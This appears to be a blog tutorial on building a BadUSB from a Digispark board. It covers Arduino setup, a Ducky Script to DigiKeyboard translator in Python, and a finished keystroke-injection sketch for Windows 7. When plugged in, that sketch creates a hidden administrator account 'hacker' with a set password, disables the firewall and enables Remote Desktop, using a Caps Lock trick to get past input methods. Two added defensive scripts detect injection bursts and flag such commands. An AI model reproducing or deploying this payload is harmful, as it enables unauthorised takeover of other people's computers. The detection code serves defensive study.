Posted on 2019-10-4 10:12:15
BadUSB overview

An old friend of mine once picked up a USB stick, was curious about it, plugged it into his PC, and the machine promptly phoned home. That silly but wonderful story made me want to learn how to build a BadUSB myself, and to keep it realistic I ordered a BadUSB board from Taobao, shown below.


Simply put: the hardware is plugged straight into the target computer and makes that computer run code, which can be used to control the host, steal information and so on (use your imagination).
Tools needed
A BadUSB Rubber Ducky board

The Arduino IDE - download: (https://www.arduino.cc/en/Main/Software)

The DPinst64 driver (pick the one matching your machine; nearly everything is a 64-bit OS now)
Installing the tools
The Arduino install needs no explanation, it is a wizard: run the installer - Next - Finish!

When installing the DPinst64 driver, choose "Always trust software from Digistump LLC" - Install - Next - Finish!


Configuring the Arduino environment
First open Arduino - File - Preferences - Additional Boards Manager URLs:
http://digistump.com/package_digistump_index.json

Then Tools - Boards Manager - wait for it to finish downloading the index:


Next, in the Type drop-down choose Contributed, then select Digistump_AVR and install it; once that finishes you are done.


Finally, under Boards pick the board model matching your device and the programmer, then open the Keyboard example as a template:


Writing the code
This is the example sketch it ships with:
#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}


void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Type out this string letter by letter on the computer (assumes US-style
  // keyboard)
  DigiKeyboard.println("Hello Power_Liu");

  // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
  // if doing keyboard stuff because it keeps talking to the computer to make
  // sure the computer knows the keyboard is alive and connected
  DigiKeyboard.delay(5000);
}

Upload and flash:
Prompt: Running Digispark Uploader…Plug in device now… (will timeout in 60 seconds)
At this point you have 60 s to plug in your BadUSB:


Prompt: Micronucleus done. Thank you! means the upload succeeded. From now on, whenever the BadUSB is plugged in it keeps typing Hello Power_Liu until you pull it out:
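The sketch above types its string letter by letter, and a HID device does that far faster and more evenly than any person can. The following Python is an added example, not code from the post or from Digistump, of the timing check a host-side input monitor can apply to key events to recognise such a burst. The key events are constructed inline rather than captured, and the 20 ms gap and 8-key minimum are assumed thresholds; the function names are my own.

```python
def build_sample_events():
    """Constructed key-event stream: (timestamp_ms, char).

    The first four keys model a person typing "dir" and Enter with 130-180 ms
    gaps; after a 2 s pause, "Hello Power_Liu" and Enter arrive every 4 ms,
    the way a DigiKeyboard sketch types them.
    """
    events = []
    t = 0
    for ch, gap in zip("dir\n", (0, 150, 130, 180)):
        t += gap
        events.append((t, ch))
    t += 2000
    for ch in "Hello Power_Liu\n":
        t += 4
        events.append((t, ch))
    return events


def find_injection_bursts(events, max_gap_ms=20, min_keys=8):
    """Return (start_ms, end_ms, text) for every run of at least min_keys key
    events whose consecutive inter-key gaps are all <= max_gap_ms.

    Thresholds are assumptions for the example: 20 ms is well below sustained
    human typing, and 8 keys avoids flagging a quick double tap.
    """
    bursts = []
    run = []
    for event in events:
        if run and event[0] - run[-1][0] > max_gap_ms:
            # the run ended: report it if it was long enough to be injection
            if len(run) >= min_keys:
                bursts.append((run[0][0], run[-1][0], "".join(c for _, c in run)))
            run = []
        run.append(event)
    if len(run) >= min_keys:
        bursts.append((run[0][0], run[-1][0], "".join(c for _, c in run)))
    return bursts


if __name__ == "__main__":
    for start, end, text in find_injection_bursts(build_sample_events()):
        print("injected burst %d-%d ms: %r" % (start, end, text))
```

On a real host the events would come from an input hook or a raw-input listener; the point is that a human typist leaves gaps of roughly 100 ms or more, while an injected string arrives at a near-constant few milliseconds per key, so a sustained run under the threshold is a strong enough signal to block the new keyboard device or prompt the user.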

Step by step: writing a "Hello Hacker!"
1. First write our script in Notepad and save it as hacker.txt:
// This script opens cmd and then types Hello Hacker!
    DELAY 5000
    GUI r
    DELAY 500
    STRING cmd
    DELAY 500
    ENTER
    ENTER
    DELAY 1000
    STRING Hello Hacker!
    DELAY 1500
    ENTER
    ENTER
2. Use our Python conversion script to turn hacker.txt into an .ino file:

Duckyspark_translator.py hacker.txt hacker
Source of the Python conversion script:

# -*- coding:utf-8 -*-

from __future__ import print_function
import sys

payload_input = ''
l = '//'
mod_input = ''
mod_output = ''


def replacement():
    # Translate a plain key line (ENTER, TAB, F5, LEFTARROW ...) into one
    # DigiKeyboard.sendKeyStroke(KEY_...) call. The replacements run left to
    # right on the raw line: 'ARROW' is stripped first so that LEFTARROW and
    # LEFT map the same way, and each key name is replaced exactly once.
    print('DigiKeyboard.', end='')
    print(
        str(l
            # 1-0 if needed
            # F1-F12 ('F1' also matches the start of 'F10'..'F12'; the trailing
            # digit is kept, so those still become KEY_F10..KEY_F12)
            .replace('F1', 'sendKeyStroke(KEY_F1')
            .replace('F2', 'sendKeyStroke(KEY_F2')
            .replace('F3', 'sendKeyStroke(KEY_F3')
            .replace('F4', 'sendKeyStroke(KEY_F4')
            .replace('F5', 'sendKeyStroke(KEY_F5')
            .replace('F6', 'sendKeyStroke(KEY_F6')
            .replace('F7', 'sendKeyStroke(KEY_F7')
            .replace('F8', 'sendKeyStroke(KEY_F8')
            .replace('F9', 'sendKeyStroke(KEY_F9')
            # arrows
            .replace('ARROW', '')
            .replace('LEFT', 'sendKeyStroke(KEY_ARROW_LEFT')
            .replace('RIGHT', 'sendKeyStroke(KEY_ARROW_RIGHT')
            .replace('UP', 'sendKeyStroke(KEY_ARROW_UP')
            .replace('DOWN', 'sendKeyStroke(KEY_ARROW_DOWN')
            # keys
            .replace('PRINTSCREEN', 'sendKeyStroke(KEY_PRT_SCR')
            .replace('TAB', 'sendKeyStroke(KEY_TAB')
            .replace('SPACE', 'sendKeyStroke(KEY_SPACE')
            .replace('ESCAPE', 'sendKeyStroke(KEY_ESC')
            .replace('ENTER', 'sendKeyStroke(KEY_ENTER')), end='')
    print(');')


def modreplacement():
    # Translate a line with a modifier prefix (ALT x, CTRL x, CONTROL x,
    # CTRL ALT x): strip the modifier word(s), map the remaining key, then
    # append the DigiKeyboard modifier constant as the second argument, which
    # is the order sendKeyStroke(key, modifiers) expects.
    print('DigiKeyboard.', end='')
    print('sendKeyStroke(', end='')
    print(
        str(l.replace(mod_input, '')
            .replace(' a', 'KEY_A')
            .replace(' b', 'KEY_B')
            .replace(' c', 'KEY_C')
            .replace(' d', 'KEY_D')
            .replace(' e', 'KEY_E')
            .replace(' f', 'KEY_F')
            .replace(' g', 'KEY_G')
            .replace(' h', 'KEY_H')
            .replace(' i', 'KEY_I')
            .replace(' j', 'KEY_J')
            .replace(' k', 'KEY_K')
            .replace(' l', 'KEY_L')
            .replace(' m', 'KEY_M')
            .replace(' n', 'KEY_N')
            .replace(' o', 'KEY_O')
            .replace(' p', 'KEY_P')
            .replace(' q', 'KEY_Q')
            .replace(' r', 'KEY_R')
            .replace(' s', 'KEY_S')
            .replace(' t', 'KEY_T')
            .replace(' u', 'KEY_U')
            .replace(' v', 'KEY_V')
            .replace(' w', 'KEY_W')
            .replace(' x', 'KEY_X')
            .replace(' y', 'KEY_Y')
            .replace(' z', 'KEY_Z')
            # 1-0
            # F1-F12 (same trailing-digit trick as in replacement())
            .replace(' F1', 'KEY_F1')
            .replace(' F2', 'KEY_F2')
            .replace(' F3', 'KEY_F3')
            .replace(' F4', 'KEY_F4')
            .replace(' F5', 'KEY_F5')
            .replace(' F6', 'KEY_F6')
            .replace(' F7', 'KEY_F7')
            .replace(' F8', 'KEY_F8')
            .replace(' F9', 'KEY_F9')
            # arrows
            .replace('ARROW', '')
            .replace('LEFT', 'KEY_ARROW_LEFT')
            .replace('RIGHT', 'KEY_ARROW_RIGHT')
            .replace('UP', 'KEY_ARROW_UP')
            .replace('DOWN', 'KEY_ARROW_DOWN')
            # keys
            .replace('PRINTSCREEN', 'KEY_PRT_SCR')
            .replace('TAB', 'KEY_TAB')
            .replace('ESCAPE', 'KEY_ESC')
            .replace('SPACE', 'KEY_SPACE')
            .replace(' ', '')
            .replace('ENTER', 'KEY_ENTER')), end='')
    print(',' + mod_output, end='')
    print(');')


# arguments
if len(sys.argv) == 2:
    try:
        payload_input = open(sys.argv[1], "r")
        sys.stdout = open("digipayload.ino", "w")
        z = len(open(sys.argv[1], "r").readlines())
    except IOError:
        print('\nError! File "' + sys.argv[1] + '" does not exist!\n')
        exit()
elif len(sys.argv) == 3:
    try:
        payload_input = open(sys.argv[1], "r")
        sys.stdout = open(sys.argv[2] + '.ino', 'w')
        z = len(open(sys.argv[1], "r").readlines())
    except IOError:
        print('\nError! File "' + sys.argv[1] + '" does not exist!\n')
        exit()
elif len(sys.argv) > 3:
    print('Too many arguments')
    exit()
else:
    payload_input = open('payload.txt', "r")
    sys.stdout = open("digipayload.ino", "w")
    z = len(open('payload.txt', "r").readlines())

# --------------------------------------
# Digispark program fragment
print('//www.liuwx.cn&Qq211124332')
print('#include "DigiKeyboard.h"')
print('#define KEY_ESC     41')
print('#define KEY_BACKSPACE 42')
print('#define KEY_TAB     43')
print('#define KEY_PRT_SCR 70')
print('#define KEY_DELETE  76\n')

print('void setup() {\n')
# Windows can take a long time to recognise the Digispark, so a 5 s delay is
# emitted here instead of 0.5 s
print('DigiKeyboard.delay(5000);')
print('DigiKeyboard.sendKeyStroke(0);')
# ---------------------------------------

for i in range(z):
    l = payload_input.readline().replace('\n', '')

    if len(l) < 1:
        continue

    if l.startswith('REM'):
        print('//', l)
    elif l.startswith('//'):
        # not Ducky Script, but pass a C++-style comment line straight through
        print(l)
    elif l.startswith('DELAY'):
        print('DigiKeyboard.', end='')
        print(l.replace('DELAY', 'delay(').replace(' ', ''), end='')
        print(');')
    elif l.startswith('STRING'):
        # Emit the text as DigiKeyboard.print(F("...")); a double quote or a
        # backslash inside the text is sent separately with char(34) / char(92)
        # so that the generated C string literal stays valid.
        print('DigiKeyboard.', end='')
        print(l.replace('"', '")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("')
               .replace('\\', '")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("')
               .replace('STRING ', 'print(F("'), end='')
        print('")', end='')
        print(');')
    elif l in ('GUI', 'WINDOWS', 'CONTROL ESCAPE'):
        print('DigiKeyboard.sendKeyStroke(KEY_ESC,MOD_CONTROL_LEFT);')
    elif l in ('GUI d', 'WINDOWS d'):
        print('DigiKeyboard.sendKeyStroke(KEY_D,MOD_GUI_LEFT);')
    elif l in ('WINDOWS r', 'GUI r'):
        print('DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);')
    elif 'MENU' in l:
        print('DigiKeyboard.sendKeyStroke(MOD_GUI_RIGHT);')
    # lines with a modifier prefix (checked most specific first)
    elif 'CONTROL ALT' in l or 'CTRL ALT' in l:
        mod_input = 'CONTROL ALT' if 'CONTROL ALT' in l else 'CTRL ALT'
        mod_output = 'MOD_ALT_RIGHT'
        modreplacement()
    elif 'ALT' in l:
        mod_input = 'ALT'
        mod_output = 'MOD_ALT_RIGHT'
        modreplacement()
    elif 'CTRL' in l:
        mod_input = 'CTRL'
        mod_output = 'MOD_CONTROL_LEFT'
        modreplacement()
    elif 'CONTROL' in l:
        mod_input = 'CONTROL'
        mod_output = 'MOD_CONTROL_LEFT'
        modreplacement()
    # plain key names
    else:
        replacement()

# Digispark program fragment
print('\n}')
print('\n')
print('void loop() {\n')
print('}\n')
# -----------------------------------

payload_input.close()
After conversion there is a hacker.ino file in the current directory:


Opened, the code looks like this:

//www.liuwx.cn&Qq211124332
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Hello Hacker!"));
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}
3. Upload the sketch - plug in the BadUSB to flash it:


Once the upload succeeds it carries out our actions automatically: it prints Hello Hacker! on the screen

Plugging the stick into a Win7 box on the LAN and logging in to its Remote Desktop
I originally wanted to write up MSF + BadUSB reverse shells for Win7 and Win10, but Baidu already has that, so there is no need to put it in this article!
Idea and main steps
1. There is a PC running Win7 on the LAN

2. Plug in the BadUSB and turn off the Win7 firewall

3. Create a user named HACKER and elevate it to administrator

4. Enable 3389 on the Win7 box

5. From another computer on the LAN, log in to the Win7 desktop with mstsc
Command notes
Command to disable the firewall: netsh firewall set opmode mode=disable

Command to enable 3389 on Win7: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

As for why some letters in my version of the 3389 command above are upper case and others lower case:

reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F

Because when the BadUSB is plugged in it first presses Caps Lock and only then runs the commands, in case the target machine has a Chinese input method active. That is why the line above has to be written this way: the lowercase letters come out as uppercase in the DOS window, and the uppercase ones come out as lowercase!

Press Enter: DigiKeyboard.sendKeyStroke(KEY_ENTER);

Wait 2 seconds before continuing (sometimes a short delay makes the step fail): DigiKeyboard.delay(2000);
The code is attached below:
//www.liuwx.cn QQ211124332

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_CAPS_LOCK  0x39

void setup() {

DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("color c"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);
DigiKeyboard.print(F("net user hacker Qliuwx123@ /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("net localgroup administrators hacker /add"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("netsh firewall set opmode mode=disable")); // disable the firewall
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F"));  // enable 3389
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() {

}
I put a demonstration of the actual result on Bilibili:
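The translator section above turns Ducky Script into DigiKeyboard calls, and the Caps Lock trick in the command notes means the text written in a sketch is not the text the machine receives. When you are handed the sketch from a device found plugged into a machine, the question that matters is what it actually typed. The following Python is an added example, not code from the post or from the Duckyspark tool: it walks the DigiKeyboard.print/println/sendKeyStroke calls in source order, tracks the Caps Lock state so that letters are case-inverted exactly as the post describes, and matches the reconstructed command lines against the host changes the post lists (account creation, admin group change, firewall off, RDP enabled). The sketch text embedded in it is a constructed excerpt modelled on the post's sketch, not the full payload; the pattern list, event names and function names are my own.

```python
import re

# Constructed excerpt modelled on the sketch in the post (not the full payload).
SAMPLE_SKETCH = r'''
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.sendKeyStroke(KEY_CAPS_LOCK);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("netsh firewall set opmode mode=disable"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print(F("reg add hklm\\system\\cURRENTcONTROLsET\\cONTROL\\tERMINAL\" \"sERVER /V FdENYtscONNECTIONS /T reg_dword /D 0 /F"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);
'''

# One regex for the three call shapes we care about, matched in source order.
# The text branch accepts a C string literal with \" and \\ escapes inside it.
CALL_RE = re.compile(
    r'DigiKeyboard\.(?P<fn>println|print|sendKeyStroke)\('
    r'(?:F\("(?P<text>(?:[^"\\]|\\.)*)"\)|(?P<args>[^)]*))\)'
)

C_ESCAPES = {'n': '\n', 't': '\t', '\\': '\\', '"': '"'}


def unescape_c(s):
    """Decode the escapes a C string literal in these sketches can carry."""
    return re.sub(r'\\(.)', lambda m: C_ESCAPES.get(m.group(1), m.group(1)), s)


def apply_caps_lock(text):
    """DigiKeyboard sends Shift for upper-case letters, so with Caps Lock on
    every letter arrives case-inverted; digits and punctuation are unchanged."""
    return ''.join(c.swapcase() if c.isalpha() else c for c in text)


def reconstruct(sketch):
    """Return what the host receives, in order: ('key', chord) for special
    keys and ('line', text) for each text line terminated by Enter."""
    caps = False
    buf = ''
    events = []
    for m in CALL_RE.finditer(sketch):
        fn = m.group('fn')
        if fn in ('print', 'println'):
            text = m.group('text')
            if text is None:                      # print("...") without F()
                text = m.group('args').strip().strip('"')
            text = unescape_c(text)
            buf += apply_caps_lock(text) if caps else text
            if fn == 'println' and buf:
                events.append(('line', buf))
                buf = ''
            continue
        args = [a.strip() for a in m.group('args').split(',') if a.strip()]
        if 'KEY_CAPS_LOCK' in args:
            caps = not caps
            events.append(('key', 'CapsLock on' if caps else 'CapsLock off'))
        elif 'KEY_ENTER' in args:
            if buf:                               # a second Enter sends nothing new
                events.append(('line', buf))
                buf = ''
        elif args and args != ['0']:              # sendKeyStroke(0) is the wake-up no-op
            events.append(('key', '+'.join(args)))
    if buf:
        events.append(('line', buf))
    return events


# Host changes the post's payload makes, as patterns over the reconstructed lines.
RISK_PATTERNS = [
    ('local account created', re.compile(r'\bnet\s+user\b.*\s/add\b', re.I)),
    ('local admin group changed', re.compile(r'\bnet\s+localgroup\s+administrators\b', re.I)),
    ('host firewall disabled', re.compile(r'\bnetsh\b.*\bfirewall\b.*\b(disable|off)\b', re.I)),
    ('RDP enabled via registry', re.compile(r'fDenyTSConnections', re.I)),
]


def flag_commands(events):
    """Pair each reconstructed command line with every risk label it matches."""
    return [(label, text)
            for kind, text in events if kind == 'line'
            for label, pat in RISK_PATTERNS if pat.search(text)]


if __name__ == '__main__':
    evs = reconstruct(SAMPLE_SKETCH)
    for kind, value in evs:
        print('%-4s %s' % (kind, value))
    for label, text in flag_commands(evs):
        print('FLAG %s: %s' % (label, text))
```

Run on the excerpt it shows that, after Win+R and Caps Lock, the machine actually receives CMD, then NETSH FIREWALL SET OPMODE MODE=DISABLE, then the registry command with its case restored to the familiar CurrentControlSet ... fDenyTSConnections form; cmd.exe does not care about case, which is why the trick works, but an analyst needs the real text to know what was run and what to look for in command-line and process-creation logs. The same reconstruction also reveals what a password typed under Caps Lock really was.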

Closing
This article is mostly about giving myself a first acquaintance with Arduino and hardware, as groundwork for studying it in more depth later: a first look at the Arduino Rubber_Ducky. If anything is lacking, feel free to add me on QQ and tell me so I can fix it!

QQ 211124332